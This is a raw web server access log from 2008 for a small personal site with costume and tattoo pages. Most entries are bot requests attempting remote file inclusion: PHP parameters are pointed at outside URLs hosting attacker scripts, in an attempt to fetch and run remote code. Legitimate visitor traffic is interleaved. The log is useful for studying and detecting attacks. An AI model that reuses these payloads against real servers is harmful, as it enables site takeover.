217.20.113.117 - - [23/Aug/2008:20:55:13 -0500] "GET /logs/access_log.1214438400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:55:14 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:55:14 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
207.58.167.158 - - [23/Aug/2008:20:55:49 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:55:49 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:55:49 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:55:53 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:55:54 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:55:54 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
66.225.211.135 - - [23/Aug/2008:20:57:03 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
12.192.82.221 - - [23/Aug/2008:20:57:27 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:57:50 -0500] "GET /logs/access_log.1213401600//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
62.87.154.41 - - [23/Aug/2008:20:57:54 -0500] "GET /logs/access_log.1215302400/inurl:%22com_dbquery%22http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 379 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
216.127.84.31 - - [23/Aug/2008:20:58:23 -0500] "GET /logs/mcf.php?content=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
216.127.84.31 - - [23/Aug/2008:20:58:23 -0500] "GET /mcf.php?content=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
207.58.167.158 - - [23/Aug/2008:20:58:33 -0500] "GET /logs//saveserver.php?thisdir=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:58:33 -0500] "GET //saveserver.php?thisdir=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.127.84.31 - - [23/Aug/2008:20:58:47 -0500] "GET /logs/mcf.php?content=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
216.127.84.31 - - [23/Aug/2008:20:58:48 -0500] "GET /mcf.php?content=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
190.137.181.149 - - [23/Aug/2008:20:59:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
190.137.181.149 - - [23/Aug/2008:20:59:25 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
203.98.87.14 - - [23/Aug/2008:20:59:28 -0500] "GET /logs/access_log.1213401600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.98.87.14 - - [23/Aug/2008:20:59:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.98.87.14 - - [23/Aug/2008:20:59:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.98.87.14 - - [23/Aug/2008:21:00:20 -0500] "GET /logs/access_log.1206576000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
80.67.20.130 - - [23/Aug/2008:21:02:33 -0500] "GET /classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
213.235.217.26 - - [23/Aug/2008:21:03:27 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.139.67.90 - - [23/Aug/2008:21:03:45 -0500] "GET /vwar//includes/functions_install.php?vwar_root=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
216.139.67.90 - - [23/Aug/2008:21:03:45 -0500] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.64"
74.6.8.121 - - [23/Aug/2008:21:04:08 -0500] "GET /logs/access_log.1207008000 HTTP/1.0" 200 373280 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.142.214.149 - - [23/Aug/2008:21:05:57 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:21:05:58 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:21:05:58 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
207.58.167.158 - - [23/Aug/2008:21:07:16 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:21:07:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:21:07:16 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:18 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:19 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:19 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:19 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:20 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
220.125.208.12 - - [23/Aug/2008:21:07:20 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
217.79.182.204 - - [23/Aug/2008:21:08:27 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://ferdhy.vndv.com/upload/test.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
217.79.182.204 - - [23/Aug/2008:21:08:27 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://ferdhy.vndv.com/upload/test.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
220.73.137.93 - - [23/Aug/2008:21:09:05 -0500] "GET /logs/index.php?redir=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
220.73.137.93 - - [23/Aug/2008:21:09:06 -0500] "GET /index.php?redir=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
70.87.240.50 - - [23/Aug/2008:21:11:09 -0500] "GET /logs/access_log.1214179200//?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
70.87.240.50 - - [23/Aug/2008:21:11:09 -0500] "GET /logs/access_log.1214179200//?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
70.87.240.50 - - [23/Aug/2008:21:11:09 -0500] "GET //?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
70.87.240.50 - - [23/Aug/2008:21:11:09 -0500] "GET //?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
70.87.240.50 - - [23/Aug/2008:21:11:10 -0500] "GET /logs//?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
70.87.240.50 - - [23/Aug/2008:21:11:10 -0500] "GET /logs//?custompluginfile[]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
203.98.87.14 - - [23/Aug/2008:21:12:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
203.98.87.14 - - [23/Aug/2008:21:12:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
173.4.6.176 - - [23/Aug/2008:21:13:40 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:42 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:43 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:44 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:49 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:13:54 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
204.3.160.212 - - [23/Aug/2008:21:14:20 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.0" 404 317 "-""libwww-perl/5.50"
80.67.20.130 - - [23/Aug/2008:21:14:21 -0500] "GET /classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
204.3.160.212 - - [23/Aug/2008:21:14:24 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://vncownz.t35.com/scan/idnew.txt??? HTTP/1.0" 404 322 "-""libwww-perl/5.50"
173.4.6.176 - - [23/Aug/2008:21:14:25 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:26 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:26 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:27 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:27 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:27 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:28 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:28 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:28 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:29 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:29 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:14:30 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
203.98.87.14 - - [23/Aug/2008:21:14:33 -0500] "GET /logs/access_log.1213401600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/lamer2020/safe1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.98.87.14 - - [23/Aug/2008:21:14:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/lamer2020/safe1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
173.4.6.176 - - [23/Aug/2008:21:14:34 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
203.98.87.14 - - [23/Aug/2008:21:14:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/lamer2020/safe1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
173.4.6.176 - - [23/Aug/2008:21:15:14 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:16 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:16 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:17 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:17 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:18 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:19 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:19 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
203.98.87.14 - - [23/Aug/2008:21:15:20 -0500] "GET /logs/access_log.1206576000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/lamer2020/safe1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
173.4.6.176 - - [23/Aug/2008:21:15:20 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:20 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:21 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:21 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
173.4.6.176 - - [23/Aug/2008:21:15:22 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Windows-Media-Player/10.00.00.3990)"
80.67.20.130 - - [23/Aug/2008:21:15:37 -0500] "GET /logs/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:21:15:39 -0500] "GET /classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
91.142.214.149 - - [23/Aug/2008:21:16:20 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
190.137.181.149 - - [23/Aug/2008:21:16:20 -0500] "GET //?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
190.137.181.149 - - [23/Aug/2008:21:16:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 96475 "-""libwww-perl/5.805"
80.67.20.130 - - [23/Aug/2008:21:16:29 -0500] "GET /logs/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:21:16:30 -0500] "GET /classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:21:17:30 -0500] "GET /logs/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:21:17:30 -0500] "GET /classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
91.142.214.149 - - [23/Aug/2008:21:18:01 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
220.125.208.12 - - [23/Aug/2008:21:18:58 -0500] "GET /logs/access_log.1213488000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.65"
98.233.101.157 - - [23/Aug/2008:21:19:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?num=50&hl=en&newwindow=1&safe=off&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=vintage+tattoo+symbolism&spell=1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
